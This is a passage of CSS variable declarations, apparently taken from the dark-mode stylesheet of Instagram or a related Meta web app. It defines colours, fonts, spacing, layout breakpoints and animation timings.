20%);--new-notification-background:#E7F3FF;--non-media-pressed:rgba(68, 73, 80, 0.15);--non-media-pressed-on-dark:rgba(255, 255, 255, 0.3);--notification-badge:#e41e3f;--placeholder-icon:#8A8D91;--placeholder-image:rgb(164, 167, 171);--placeholder-text:#8A8D91;--placeholder-text-on-media:rgba(255, 255, 255, 0.5);--popover-background:#3E4042;--positive:#31A24C;--positive-background:#1F3520;--press-overlay:rgba(255, 255, 255, 0.2);--primary-button-background:#0095F6;--primary-button-icon:#FFFFFF;--primary-button-pressed:#77A7FF;--primary-button-text:#FFFFFF;--primary-deemphasized-button-background:rgba(45, 136, 255, 0.2);--primary-deemphasized-button-pressed:rgba(24, 119, 242, 0.2);--primary-deemphasized-button-pressed-overlay:rgba(25, 110, 255, 0.15);--primary-deemphasized-button-text:#2D88FF;--primary-icon:#E4E6EB;--primary-text:#E4E6EB;--primary-text-on-media:white;--primary-web-focus-indicator:#D24294;--progress-ring-neutral-background:rgba(255, 255, 255, 0.2);--progress-ring-neutral-foreground:#ffffff;--progress-ring-on-media-background:rgba(255, 255, 255, 0.2);--progress-ring-on-media-foreground:#FFFFFF;--progress-ring-blue-background:rgba(45, 136, 255, 0.2);--progress-ring-blue-foreground:hsl(214, 100%, 59%);--progress-ring-disabled-background:rgba(122,125,130, 0.2);--progress-ring-disabled-foreground:#7A7D82;--rating-star-active:#FF9831;--scroll-thumb:rgba(255, 255, 255, 0.3);--scroll-shadow:0 1px 2px rgba(0, 0, 0, 0.1), 0 -1px rgba(255, 255, 255, 0.05) inset;--secondary-button-background:rgba(255,255,255,.1);--secondary-button-background-floating:#4B4C4F;--secondary-button-background-on-dark:rgba(255, 255, 255, 0.4);--secondary-button-pressed:rgba(0, 0, 0, 0.05);--secondary-button-stroke:transparent;--secondary-button-text:#E4E6EB;--secondary-icon:#B0B3B8;--secondary-text:#B0B3B8;--secondary-text-on-media:rgba(255, 255, 255, 0.9);--section-header-text:#BCC0C4;--shadow-1:rgba(0, 0, 0, 0.1);--shadow-2:rgba(0, 0, 0, 0.2);--shadow-5:rgba(0, 0, 0, 0.5);--shadow-8:rgba(0, 0, 0, 0.8);--shadow-base:0 1px 2px var(--shadow-2);--shadow-elevated:0 8px 20px 0 rgba(0, 0, 0, 0.2), 0 2px 4px 0 rgba(0, 0, 0, 0.1);--shadow-emphasis:0 2px 12px var(--shadow-2);--shadow-inset:rgba(255, 255, 255, 0.05);--shadow-on-media:0px 0px 1px rgba(0, 0, 0, 0.62);--shadow-persistent:0px 0px 12px rgba(28, 43, 51, 0.6);--shadow-primary:0px 0px 12px rgba(28, 43, 51, 0.1);--shadow-responsive:0px 8px 16px 0px rgba(0, 0, 0, 0.1);--surface-background:#242526;--switch-active:hsl(214, 100%, 59%);--switch-inactive:#3E4042;--switch-unchecked-background-color:#6F7276;--text-highlight:rgba(24, 119, 242, 0.45);--input-background:#242526;--input-background-hover:var(--input-background);--input-background-warn-hover:hsla(var(--warning-h), var(--warning-s), var(--warning-l), 0.05);--input-background-error-hover:hsla(var(--negative-h), var(--negative-s), var(--negative-l), 0.05);--input-background-active:hsla(var(--accent-h), var(--accent-s), var(--accent-l), 0.05);--input-background-warn-active:hsla(var(--warning-h), var(--warning-s), var(--warning-l), 0.05);--input-background-error-active:hsla(var(--negative-h), var(--negative-s), var(--negative-l), 0.05);--input-background-disabled:#18191A;--input-border-color:#3E4042;--input-border-color-hover:var(--placeholder-text);--input-label-color-highlighted:hsl(214, 100%, 59%);--input-label-color-inside:var(--secondary-text);--input-label-color-error:var(--negative);--input-label-color-disabled:var(--disabled-text);--text-input-outside-label:#FFFFFF;--toast-background:#242526;--toast-text:#FFFFFF;--toast-text-link:#4599FF;--toast-border-color:transparent;--toast-border-style:none;--toast-border-width:0px;--toggle-active-background:rgb(45, 136, 255);--toggle-active-icon:#FFFFFF;--toggle-active-text:#FFFFFF;--toggle-button-active-background:#E6F2FF;--tooltip-background:rgba(11, 11, 11, 0.8);--tooltip-box-shadow:0 2px 4px 0 var(--shadow-5);--popover-border-color:transparent;--wash:#3E4042;--web-wash:#18191A;--warning:hsl(40, 89%, 52%);--chat-bubble-emphasis-ring-after:white;--chat-bubble-emphasis-ring-before:black;--chat-text-blockquote-color-background-line:rgba(255, 255, 255, 0.19);--chat-text-blockquote-color-text-primary-media:rgba(255, 255, 255, 0.7);--chat-incoming-message-bubble-background-color:#303030;--chat-outgoing-message-bubble-background-color:var(--accent);--chat-replied-message-background-color:rgba(255, 255, 255, 0.12);--radio-border-color:var(--primary-icon);--radio-border-color-disabled:var(--disabled-button-background);--radio-border-color-selected:var(--accent);--radio-checked-icon-color:var(--accent);--radio-checked-icon-color-disabled:var(--disabled-button-background);--dialog-anchor-vertical-padding:56px;--header-height:0px;--global-panel-width:0px;--global-panel-width-expanded:0px;--alert-banner-corner-radius:8px;--button-corner-radius:4px;--button-corner-radius-medium:10px;--button-corner-radius-large:12px;--button-height-large:40px;--button-height-medium:36px;--button-padding-horizontal-large:16px;--button-padding-horizontal-medium:16px;--button-padding-icon-only:16px;--button-icon-padding-large:16px;--button-icon-padding-medium:16px;--button-inner-icon-spacing-large:3px;--button-inner-icon-spacing-medium:3px;--blueprint-button-height-medium:40px;--blueprint-button-height-large:48px;--card-corner-radius:4px;--card-box-shadow:0 12px 28px 0 var(--shadow-2), 0 2px 4px 0 var(--shadow-1);--card-padding-horizontal:10px;--card-padding-vertical:20px;--chip-corner-radius:6px;--comment-bubble:18px;--dialog-corner-radius:8px;--glimmer-corner-radius:8px;--image-corner-radius:4px;--infochip-medium-radius:12px;--input-corner-radius:6px;--input-border-width:1px;--nav-list-cell-corner-radius:8px;--list-cell-corner-radius:8px;--list-cell-min-height:52px;--list-cell-padding-vertical:20px;--list-cell-padding-vertical-with-addon:14px;--menu-base-list-item-padding-horizontal:8px;--menu-base-list-item-padding-vertical:12px;--menu-base-size-full-margin-end:48px;--menu-item-base-margin-horizontal:8px;--menu-item-base-margin-vertical:0px;--menu-item-base-padding-horizontal:8px;--menu-item-base-overlay-radius:4px;--menu-item-base-padding-vertical:12px;--menu-item-base-with-icon-padding-horizontal:var(--menu-item-base-padding-horizontal);--separator-menu-item-margin-horizontal:16px;--separator-menu-item-margin-vertical:4px;--nav-list-cell-min-height:0px;--nav-list-cell-padding-vertical:16px;--nav-list-cell-padding-vertical-with-addon:16px;--nux-card-body-padding-end:24px;--page-footer-padding-vertical:16px;--popover-border-style:none;--popover-border-width:0px;--section-header-addOnEnd-margin-horizontal:8px;--section-header-addOnStart-margin-horizontal:12px;--section-header-addOnEnd-button-padding-horizontal:0px;--section-header-addOnEnd-button-padding-vertical:0px;--section-header-padding-vertical:16px;--section-header-subtitle-margin-vertical:14px;--section-header-subtitle-with-addOnEnd-margin-vertical:6px;--tab-height:60px;--tab-icon-padding-end:0px;--tab-text-icon-gap:4px;--tab-underline-color:transparent;--tab-underline-height:3px;--text-badge-corner-radius:4px;--text-badge-padding-horizontal:6px;--text-badge-padding-vertical:6px;--text-input-multi-padding-between-text-scrollbar:20px;--text-input-multi-padding-scrollbar:16px;--text-input-caption-margin-top:10px;--text-input-padding-vertical:12px;--toast-addon-padding-horizontal:6px;--toast-addon-padding-vertical:6px;--toast-container-max-width:100%;--toast-container-min-width:288px;--toast-container-padding-horizontal:10px;--toast-container-padding-vertical:16px;--toast-corner-radius:8px;--toaster-view-max-width:328px;--tooltip-corner-radius:8px;--typeahead-list-outer-padding-vertical:2px;--fds-animation-enter-exit-in:cubic-bezier(0.14, 1, 0.34, 1);--fds-animation-enter-exit-out:cubic-bezier(0.45, 0.1, 0.2, 1);--fds-animation-swap-shuffle-in:cubic-bezier(0.14, 1, 0.34, 1);--fds-animation-swap-shuffle-out:cubic-bezier(0.45, 0.1, 0.2, 1);--fds-animation-move-in:cubic-bezier(0.17, 0.17, 0, 1);--fds-animation-move-out:cubic-bezier(0.17, 0.17, 0, 1);--fds-animation-expand-collapse-in:cubic-bezier(0.17, 0.17, 0, 1);--fds-animation-expand-collapse-out:cubic-bezier(0.17, 0.17, 0, 1);--fds-animation-passive-move-in:cubic-bezier(0.5, 0, 0.1, 1);--fds-animation-passive-move-out:cubic-bezier(0.5, 0, 0.1, 1);--fds-animation-quick-move-in:cubic-bezier(0.1, 0.9, 0.2, 1);--fds-animation-quick-move-out:cubic-bezier(0.1, 0.9, 0.2, 1);--fds-animation-fade-in:cubic-bezier(0, 0, 1, 1);--fds-animation-fade-out:cubic-bezier(0, 0, 1, 1);--fds-duration-extra-extra-short-in:100ms;--fds-duration-extra-extra-short-out:100ms;--fds-duration-extra-short-in:200ms;--fds-duration-extra-short-out:150ms;--fds-duration-short-in:280ms;--fds-duration-short-out:200ms;--fds-duration-medium-in:400ms;--fds-duration-medium-out:350ms;--fds-duration-long-in:500ms;--fds-duration-long-out:350ms;--fds-duration-extra-long-in:1000ms;--fds-duration-extra-long-out:1000ms;--fds-duration-none:0ms;--fds-fast:200ms;--fds-slow:400ms;--font-family-apple:system-ui, -apple-system, BlinkMacSystemFont, '.SFNSText-Regular', sans-serif;--font-family-code:ui-monospace, Menlo, Consolas, Monaco, monospace;--font-family-default:Helvetica, Arial, sans-serif;--font-family-segoe:Segoe UI Historic, Segoe UI, Helvetica, Arial, sans-serif;--body-font-family:Placeholder Font;--body-font-size:0.9375rem;--body-font-weight:400;--body-line-height:1.3333;--body-emphasized-font-family:Placeholder Font;--body-emphasized-font-size:0.9375rem;--body-emphasized-font-weight:600;--body-emphasized-line-height:1.3333;--headline1-font-family:Optimistic Display Bold, system-ui, sans-serif;--headline1-font-size:1.75rem;--headline1-font-weight:700;--headline1-line-height:1.2143;--headline2-font-family:Optimistic Display Bold, system-ui, sans-serif;--headline2-font-size:1.5rem;--headline2-font-weight:700;--headline2-line-height:1.25;--headline3-font-family:Optimistic Display Bold, system-ui, sans-serif;--headline3-font-size:1.0625rem;--headline3-font-weight:700;--headline3-line-height:1.2941;--meta-font-family:Placeholder Font;--meta-font-size:0.8125rem;--meta-font-weight:400;--meta-line-height:1.3846;--meta-emphasized-font-family:Placeholder Font;--meta-emphasized-font-size:0.8125rem;--meta-emphasized-font-weight:600;--meta-emphasized-line-height:1.3846;--primary-label-font-family:Optimistic Display Medium, system-ui, sans-serif;--primary-label-font-size:1.0625rem;--primary-label-font-weight:500;--primary-label-line-height:1.2941;--secondary-label-font-family:Placeholder Font;--secondary-label-font-size:0.9375rem;--secondary-label-font-weight:500;--secondary-label-line-height:1.3333;--tertiary-label-font-family:Placeholder Font;--tertiary-label-font-size:0.6875rem;--tertiary-label-font-weight:500;--tertiary-label-line-height:1.4545;--text-input-field-font-family:Placeholder Font;--text-input-field-font-size:1rem;--text-input-field-font-stretch:initial;--text-input-field-font-weight:500;--text-input-field-line-height:1.2941;--text-input-label-font-family:Placeholder Font;--text-input-label-font-size:17px;--text-input-label-font-size-scale-multiplier:0.75;--text-input-label-font-stretch:initial;--text-input-label-font-weight:400;--text-input-label-line-height:1.2941;--messenger-card-min-width:300px;--messenger-card-max-width:480px;--messenger-application-max-width:2560px;--messenger-sidebar-collapsed-width:44px;--messenger-sidebar-expanded-width:240px;--messenger-card-corner-radius:8px;--messenger-card-spacing:16px;--chat-bubble-padding-vertical:8px;--chat-bubble-padding-horizontal:12px;--chat-bubble-border-radius:18px;--dialog-size-medium-width:100%;--dialog-size-small-width:100%;--focus-ring-outline-forced-colors:2px auto transparent !important;--focus-ring-outline-link:2px auto var(--focus-ring-blue);--focus-ring-shadow-default:0 0 0 2px var(--always-white), 0 0 0 4px var(--focus-ring-blue);--focus-ring-shadow-inset:0 0 0 2px var(--focus-ring-blue) inset, 0 0 0 4px var(--always-white) inset;--glimmer-animation-direction:alternate;--glimmer-animation-duration:1000ms;--glimmer-animation-timing-function:steps(10, end);--glimmer-opacity-min:0.25;--glimmer-opacity-max:1;--radio-checked-icon-size-large:12px;--radio-checked-icon-size-medium:12px;--radio-border-width:2px;--radio-size-large:24px;--radio-size-medium:20px;--blue-primary:rgb(0,136,244);--blue-secondary:rgb(235,245,255);--blue-tertiary:rgb(4,59,114);--chartreuse-primary:rgb(106,147,22);--chartreuse-secondary:rgb(226,255,152);--chartreuse-tertiary:rgb(50,65,19);--cyan-primary:rgb(0,142,213);--cyan-secondary:rgb(231,245,255);--cyan-tertiary:rgb(15,63,93);--dataviz-primary-2:rgb(156,219,255);--dataviz-primary-3:rgb(73,156,255);--dataviz-secondary-1:rgb(92,87,210);--dataviz-secondary-2:rgb(142,129,255);--dataviz-secondary-3:rgb(119,45,88);--dataviz-supplementary-1:rgb(253,91,67);--dataviz-supplementary-2:rgb(161,132,0);--dataviz-supplementary-3:rgb(36,131,44);--dataviz-supplementary-4:rgb(232,234,238);--fuschia-primary:rgb(250,45,138);--fuschia-secondary:rgb(255,241,246);--fuschia-tertiary:rgb(118,14,62);--green-primary:rgb(43,154,53);--green-secondary:rgb(227,250,224);--green-tertiary:rgb(26,68,27);--magenta-primary:rgb(215,77,204);--magenta-secondary:rgb(255,239,254);--magenta-tertiary:rgb(96,36,91);--orange-primary:rgb(208,108,20);--orange-secondary:rgb(255,241,239);--orange-tertiary:rgb(94,49,14);--purple-primary:rgb(125,116,255);--purple-secondary:rgb(245,241,255);--purple-tertiary:rgb(55,50,121);--red-primary:rgb(251,60,68);--red-secondary:rgb(255,241,239);--red-tertiary:rgb(118,22,27);--teal-primary:rgb(0,152,124);--teal-secondary:rgb(227,247,241);--teal-tertiary:rgb(10,68,56);--yellow-primary:rgb(161,132,0);--yellow-secondary:rgb(255,246,161);--yellow-tertiary:rgb(72,59,12);--base-unit:4px;--blue-0:245, 251, 255;--blue-1:224, 241, 255;--blue-2:179, 219, 255;--blue-3:112, 188, 255;--blue-4:71, 175, 255;--blue-5:0, 149, 246;--blue-6:0, 116, 204;--blue-7:0, 87, 163;--blue-8:0, 55, 107;--blue-9:0, 41, 82;--breakpoint-medium-width:1536px;--breakpoint-small-width:1024px;--challenge-width:460px;--creation-header-height:43px;--creation-min-padding-x:32px;--creation-modal-max-height:898px;--creation-modal-min-height:391px;--creation-padding-x:64px;--creation-padding-y:112px;--creation-settings-width:340px;--cyan-5:39, 196, 245;--desktop-grid-item-margin:28px;--desktop-grid-item-margin-slim:4px;--desktop-in-feed-story-item-height:208px;--desktop-in-feed-story-item-width:116px;--desktop-nav-height:60px;--desktop-skinny-nav-height:60px;--desktop-story-tray-bottom-margin:48px;--desktop-story-tray-bottom-margin-denser:24px;--direct-attachment-image-grid-item-size:78px;--direct-attachment-story-height:150px;--direct-attachment-story-large-height:256px;--direct-attachment-story-large-width:164px;--direct-attachment-story-width:84px;--direct-message-max-width:236px;--fb-signup-page-profile-pic-size:88px;--feed-sidebar-padding:32px;--feed-sidebar-width:319px;--feed-width:470px;--feed-width-wide-story:630px;--feed-width-wide-story-prism:702px;--font-family-system:-apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;--font-family-system-prism:"Instagram Sans UI", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;--font-weight-system-bold:700;--font-weight-system-extra-bold:800;--font-weight-system-extra-light:200;--font-weight-system-light:300;--font-weight-system-medium:500;--font-weight-system-regular:400;--font-weight-system-semibold:600;--footer-width-wide:1150px;--gradient-lavender:211, 0, 197;--gradient-orange:255, 122, 0;--gradient-pink:255, 1, 105;--gradient-purple:118, 56, 250;--gradient-red:255, 48, 64;--gradient-yellow:255, 214, 0;--green-4:120, 222, 69;--green-5:88, 195, 34;--green-6:55, 166, 0;--grey-0:245, 245, 245;--grey-1:239, 239, 239;--grey-2:219, 219, 219;--grey-3:199, 199, 199;--grey-4:168, 168, 168;--grey-5:142, 142, 142;--grey-6:115, 115, 115;--grey-7:85, 85, 85;--grey-8:54, 54, 54;--grey-9:38, 38, 38;--grey-10:26, 26, 26;--grey-0-prism:248, 249, 249;--grey-1-prism:243, 245, 247;--grey-2-prism:233, 237, 240;--grey-3-prism:219, 223, 228;--grey-4-prism:162, 170, 180;--grey-5-prism:131, 137, 147;--grey-6-prism:111, 118, 128;--grey-7-prism:94, 100, 109;--grey-8-prism:50, 53, 57;--grey-9-prism:41, 41, 46;--grey-10-prism:33, 35, 38;--ig-badge:255, 48, 64;--ig-close-friends-refreshed:28, 209, 79;--ig-disabled-action-text:169, 219, 255;--ig-error-or-destructive:237, 73, 86;--ig-facebook-blue:53, 121, 234;--ig-live-badge:255, 1, 105;--ig-primary-button:0, 149, 246;--ig-primary-button-hover:24, 119, 242;--ig-secondary-icon:142, 142, 142;--ig-stroke-on-media:255, 255, 255;--ig-tertiary-button-background:255, 255, 255;--ig-tertiary-button-border:219, 219, 219;--ig-tertiary-button-hover:245, 245, 245;--ig-tertiary-button-text:38, 38, 38;--ig-subscribers-only:118, 56, 250;--ig-success:88, 195, 34;--ig-text-on-color:255, 255, 255;--ig-text-on-media:255, 255, 255;--in-feed-story-item-height:240px;--in-feed-story-item-width:135px;--in-feed-story-item-padding:12px;--input-border-radius:6px;--large-layout-min:1500px;--live-video-border-radius:4px;--media-content-card-width:350px;--media-content-card-width-small:300px;--media-info:335px;--medium-layout-max:1499px;--medium-layout-min:1080px;--medium-screen-max:875px;--medium-screen-min:736px;--mobile-grid-item-margin:2px;--mobile-nav-height:45px;--modal-backdrop-dark:rgba(0, 0, 0, 0.85);--modal-backdrop-default:rgba(0, 0, 0, 0.65);--modal-border-radius:12px;--modal-padding:16px;--modal-z-index:100;--nav-narrow-width:72px;--nav-medium-width:244px;--nav-wide-width:335px;--nav-bottom-screen-max:767px;--nav-narrow-screen-min:768px;--nav-medium-screen-min:1264px;--nav-wide-screen-min:1920px;--orange-5:253, 141, 50;--photo:600px;--pink-5:209, 8, 105;--polaris-feed-with-padding-threshold-min:640px;--polaris-extra-small-screen-max:413px;--polaris-small-screen-min:414px;--polaris-small-screen-max:735px;--polaris-medium-screen-min:736px;--polaris-medium-screen-max:875px;--polaris-large-screen-min:876px;--polaris-nav-bottom-screen-max:767px;--polaris-post-modal-small-screen-max:1366px;--polaris-post-modal-large-screen-min:1536px;--polaris-post-modal-large-height-max:1032px;--polaris-challenge-width:460px;--polaris-breakpoint-medium-width:1536px;--polaris-breakpoint-small-width:1024px;--polaris-site-width-narrow:600px;--polaris-site-width-wide:935px;--polaris-site-padding-top:30px;--purple-5:163, 7, 186;--red-4:255, 104, 116;--red-5:237, 73, 86;--red-6:198, 35, 48;--red-7:167, 3, 17;--reels-large-screen-min:1366px;--refinement-section-height:50px;--revamp-nav-bottom-toolbar-height:50px;--revamp-feed-card-max-height:835px;--revamp-feed-card-min-height:615px;--revamp-feed-card-media-min-width:390px;--revamp-feed-card-dense-padding:16px;--revamp-feed-item-spacing:20px;--revamp-feed-horizontal-padding-small-screen:24px;--revamp-feed-horizontal-padding-large-screen:32px;--revamp-feed-vertical-padding:32px;--right-rail-width:300px;--scrollable-content-header-height-large:56px;--scrollable-content-header-height-med:49px;--scrollable-content-header-height:44px;--search-box-height:40px;--search-modal-height-expanded:450px;--search-modal-height:362px;--search-modal-top-offset:12px;--search-result-height:50px;--search-result-inline-top-offset:60px;--search-result-list-width:375px;--site-width-narrow:600px;--site-width-wide:935px;--small-layout-max:1079px;--small-layout-min:800px;--small-screen-max:735px;--small-screen-min:414px;--story-progressbar-update-tick:0.1s;--story-swap-animation-duration:350ms;--system-10-font-size:10px;--system-10-line-height:12px;--system-11-font-size:11px;--system-11-line-height:13px;--system-12-font-size:12px;--system-12-line-height:16px;--system-14-font-size:14px;--system-14-line-height:18px;--system-16-font-size:16px;--system-16-line-height:20px;--system-18-font-size:18px;--system-18-line-height:24px;--system-20-font-size:20px;--system-20-line-height:25px;--system-22-font-size:22px;--system-22-line-height:26px;--system-24-font-size:24px;--system-24-line-height:27px;--system-26-font-size:26px;--system-26-line-height:28px;--system-28-font-size:28px;--system-28-line-height:32px;--system-30-font-size:30px;--system-30-line-height:36px;--system-32-font-size:32px;--system-32-line-height:40px;--web-always-black:0, 0, 0;--web-always-white:255, 255, 255;--web-overlay-on-media:38, 38, 38;--web-prism-black:15, 20, 25;--web-secondary-action:224, 241, 255;--yellow-5:253, 203, 92;--barcelona-logo:255, 255, 255;--challenge-link:219, 219, 219;--ig-banner-background:38, 38, 38;--ig-elevated-background:38, 38, 38;--ig-elevated-highlight-background:54, 54, 54;--ig-elevated-separator:54, 54, 54;--ig-focus-stroke:85, 85, 85;--ig-highlight-background:38, 38, 38;--ig-hover-overlay:255, 255, 255, 0.1;--ig-link:224, 241, 255;--ig-primary-background:0, 0, 0;--ig-primary-icon:245, 245, 245;--ig-primary-text:245, 245, 245;--ig-secondary-background:26, 26, 26;--ig-secondary-button:245, 245, 245;--ig-secondary-button-background:85, 85, 85, 0.7;--ig-secondary-button-hover:54, 54, 54;--ig-secondary-text:168, 168, 168;--ig-separator:38, 38, 38;--ig-stroke:54, 54, 54;--ig-temporary-highlight:0, 149, 246;--ig-tertiary-icon:115, 115, 115;--ig-tertiary-text:115, 115, 115;--post-separator:38, 38, 38;--tos-box-shadow:255, 255, 255;--ig-toggle-background-on-prism:248, 249, 249;--ig-toggle-background-off-prism:50, 53, 57;--ig-toggle-background-disabled-on-prism:111, 118, 128;--ig-toggle-background-disabled-off-prism:41, 41, 46;--ig-toggle-outline-prism:219, 223, 228;--ig-toggle-outline-disabled-prism:94, 100, 109;--ig-stroke-prism:15, 20, 25;--ig-stroke-disabled-on-prism:50, 53, 57;--ig-stroke-disabled-off-prism:33, 35, 38;--ig-dropdown-background:41, 41, 46;}}.__ig-dark-mode {--fds-black:black;--fds-black-alpha-05:rgba(0, 0, 0, 0.05);--fds-black-alpha-10:rgba(0, 0, 0, 0.1);--fds-black-alpha-15:rgba(0, 0, 0, 0.15);--fds-black-alpha-20:rgba(0, 0, 0, 0.2);--fds-black-alpha-30:rgba(0, 0, 0, 0.3);--fds-black-alpha-40:rgba(0, 0, 0, 0.4);--fds-black-alpha-50:rgba(0, 0, 0, 0.5);--fds-black-alpha-60:rgba(0, 0, 0, 0.6);--fds-black-alpha-80:rgba(0, 0, 0, 0.8);--fds-blue-05:black;--fds-blue-30:black;--fds-blue-40:black;--fds-blue-60:black;--fds-blue-70:black;--fds-blue-80:black;--fds-button-text:black;--fds-comment-background:black;--fds-dark-mode-gray-35:black;--fds-dark-mode-gray-50:black;--fds-dark-mode-gray-70:black;--fds-dark-mode-gray-80:black;--fds-dark-mode-gray-90:black;--fds-dark-mode-gray-100:black;--fds-gray-00:black;--fds-gray-05:black;--fds-gray-10:black;--fds-gray-20:black;--fds-gray-25:black;--fds-gray-30:black;--fds-gray-45:black;--fds-gray-70:black;--fds-gray-80:black;--fds-gray-90:black;--fds-gray-100:black;--fds-green-55:black;--fds-green-65:black;--fds-highlight:black;--fds-highlight-cell-background:black;--fds-primary-icon:white;--fds-primary-text:white;--fds-red-55:black;--fds-soft:cubic-bezier(.08,.52,.52,1);--fds-spectrum-aluminum-tint-70:black;--fds-spectrum-blue-gray-tint-70:black;--fds-spectrum-cherry:black;--fds-spectrum-cherry-tint-70:black;--fds-spectrum-grape-tint-70:black;--fds-spectrum-grape-tint-90:black;--fds-spectrum-lemon-dark-1:black;--fds-spectrum-lemon-tint-70:black;--fds-spectrum-lime:black;--fds-spectrum-lime-tint-70:black;--fds-spectrum-orange-tint-70:black;--fds-spectrum-orange-tint-90:black;--fds-spectrum-seafoam-tint-70:black;--fds-spectrum-slate-dark-2:black;--fds-spectrum-slate-tint-70:black;--fds-spectrum-teal:black;--fds-spectrum-teal-dark-1:black;--fds-spectrum-teal-dark-2:black;--fds-spectrum-teal-tint-70:black;--fds-spectrum-teal-tint-90:black;--fds-spectrum-tomato:black;--fds-spectrum-tomato-tint-30:black;--fds-spectrum-tomato-tint-90:black;--fds-strong:cubic-bezier(.12,.8,.32,1);--fds-unified-blue-35:black;--fds-unified-gray-20:black;--fds-white:black;--fds-white-alpha-05:rgba(255, 255, 255, 0.05);--fds-white-alpha-10:rgba(255, 255, 255, 0.1);--fds-white-alpha-20:rgba(255, 255, 255, 0.2);--fds-white-alpha-30:rgba(255, 255, 255, 0.3);--fds-white-alpha-40:rgba(255, 255, 255, 0.4);--fds-white-alpha-50:rgba(255, 255, 255, 0.5);--fds-white-alpha-60:rgba(255, 255, 255, 0.6);--fds-white-alpha-80:rgba(255, 255, 255, 0.8);--fds-yellow-20:black;--accent:#0095F6;--always-white:white;--always-black:black;--always-dark-gradient:linear-gradient(rgba(0,0,0,0), rgba(0,0,0,0.6));--always-dark-overlay:rgba(0, 0, 0, 0.4);--always-light-overlay:rgba(255, 255, 255, 0.4);--always-gray-40:#65676B;--always-gray-75:#BCC0C4;--always-gray-95:#F0F2F5;--attachment-footer-background:rgba(255,255,255,0.1);--background-deemphasized:rgba(255,255,255,0.1);--badge-background-color-blue:var(--accent);--badge-background-color-dark-gray:var(--secondary-icon);--badge-background-color-gray:var(--disabled-icon);--badge-background-color-green:var(--positive);--badge-background-color-light-blue:var(--highlight-bg);--badge-background-color-red:var(--notification-badge);--badge-background-color-yellow:var(--base-lemon);--base-blue:#1877F2;--base-cherry:#F3425F;--base-grape:#9360F7;--base-lemon:#F7B928;--base-lime:#45BD62;--base-pink:#FF66BF;--base-seafoam:#54C7EC;--base-teal:#2ABBA7;--base-tomato:#FB724B;--text-badge-info-background:hsl(214, 100%, 59%);--text-badge-success-background:#31A24C;--text-badge-attention-background:hsl(40, 89%, 52%);--text-badge-critical-background:#e41e3f;--blue-link:#00376B;--border-focused:#8A8D91;--card-background:#242526;--card-background-flat:#323436;--comment-background:#3A3B3C;--comment-footer-background:#4E4F50;--dataviz-primary-1:rgb(0,174,143);--disabled-button-background:rgba(255, 255, 255, 0.2);--disabled-button-text:rgba(255, 255, 255, 0.3);--disabled-icon:rgba(255, 255, 255, 0.3);--disabled-text:rgba(255, 255, 255, 0.3);--divider:#3E4042;--event-date:#F3425F;--fb-wordmark:#FFFFFF;--fb-logo:#0866FF;--filter-accent:invert(40%) sepia(52%) saturate(200%) saturate(200%) saturate(200%) saturate(189%) hue-rotate(191deg) brightness(103%) contrast(102%);--filter-always-white:invert(100%);--filter-disabled-icon:invert(100%) opacity(30%);--filter-placeholder-icon:invert(59%) sepia(11%) saturate(200%) saturate(135%) hue-rotate(176deg) brightness(96%) contrast(94%);--filter-primary-accent:invert(40%) sepia(52%) saturate(200%) saturate(200%) saturate(200%) saturate(189%) hue-rotate(191deg) brightness(103%) contrast(102%);--filter-primary-icon:invert(89%) sepia(6%) hue-rotate(185deg);--filter-secondary-button-icon-on-media:invert(100%);--filter-secondary-icon:invert(62%) sepia(98%) saturate(12%) hue-rotate(175deg) brightness(90%) contrast(96%);--filter-warning-icon:invert(77%) sepia(29%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(128%) hue-rotate(359deg) brightness(102%) contrast(107%);--filter-blue-link-icon:invert(73%) sepia(29%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(103.25%) hue-rotate(189deg) brightness(101%) contrast(101%);--filter-positive:invert(37%) sepia(61%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(115%) hue-rotate(91deg) brightness(97%) contrast(105%);--filter-primary-deemphasized-button-icon:brightness(0) saturate(100%) invert(63%) sepia(20%) saturate(1290%) hue-rotate(185deg) brightness(107%) contrast(101%);--filter-negative:invert(25%) sepia(33%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(200%) saturate(110%) hue-rotate(345deg) brightness(132%) contrast(96%);--focus-ring-blue:#1877F2;--glimmer-spinner-icon:white;--hero-banner-background:#E85D07;--hosted-view-selected-state:rgba(45, 136, 255, 0.1);--highlight-bg:rgba(24, 119, 242, .31);--hover-overlay:rgba(255, 255, 255, 0.1);--inverse-text:var(--always-white);--list-cell-chevron:#B0B3B8;--media-hover:rgba(68, 73, 80, 0.15);--media-inner-border:rgba(255, 255, 255, 0.05);--media-outer-border:#33363A;--media-pressed:rgba(68, 73, 80, 0.35);--messenger-card-background:#242526;--messenger-card-box-shadow:0px 0px 16px rgba(0, 0, 0, 0.3);--mwp-header-background-color:var(--messenger-card-background);--mwp-header-button-color:var(--accent);--mwp-message-row-background:var(--messenger-card-background);--messenger-reply-background:#18191A;--overlay-alpha-80:rgba(0, 0, 0, 0.65);--overlay-on-media:rgba(0, 0, 0, 0.6);--nav-bar-background:#242526;--popover-card-background:var(--card-background);--nav-bar-background-gradient:linear-gradient(to top, #242526, rgba(36,37,38,.9), rgba(36,37,38,.7), rgba(36,37,38,.4), rgba(36,37,38,0));--nav-bar-background-gradient-wash:linear-gradient(to top, #18191A, rgba(24,25,26,.9), rgba(24,25,26,.7), rgba(24,25,26,.4), rgba(24,25,26,0));--negative:hsl(350, 87%, 55%);--negative-background:hsl(350, 87%, 55%, 20%);--new-notification-background:#E7F3FF;--non-media-pressed:rgba(68, 73, 80, 0.15);--non-media-pressed-on-dark:rgba(255, 255, 255, 0.3);--notification-badge:#e41e3f;--placeholder-icon:#8A8D91;--placeholder-image:rgb(164, 167, 171);--placeholder-text:#8A8D91;--placeholder-text-on-media:rgba(255, 255, 255, 0.5);--popover-background:#3E4042;--positive:#31A24C;--positive-background:#1F3520;--press-overlay:rgba(255, 255, 255, 0.2);--primary-button-background:#0095F6;--primary-button-icon:#FFFFFF;--primary-button-pressed:#77A7FF;--primary-button-text:#FFFFFF;--primary-deemphasized-button-background:rgba(45, 136, 255, 0.2);--primary-deemphasized-button-pressed:rgba(24, 119, 242, 0.2);--primary-deemphasized-button-pressed-overlay:rgba(25, 110, 255, 